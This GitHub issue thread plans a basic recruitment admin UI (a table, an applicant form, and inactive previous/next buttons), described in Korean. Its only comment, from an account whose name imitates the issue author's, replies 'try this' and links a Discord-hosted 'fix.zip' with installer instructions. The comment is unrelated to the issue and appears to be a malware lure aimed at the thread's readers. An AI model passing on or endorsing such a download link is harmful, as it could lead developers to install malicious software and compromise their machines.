### ISSUE TITLE
[DEV] Admin recruit basic UI 

### ISSUE THREAD

**Issue by lims00** [CECOM-CAU/CECOM_Web_Admin#12]
## Summary
Admin recruit basic UI 

## Description
- 테이블 기본 구조 제작 
- 지원자 기본 정보 폼 제작
- 이전 이후 버튼 제작 ( 기능 없음 )

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
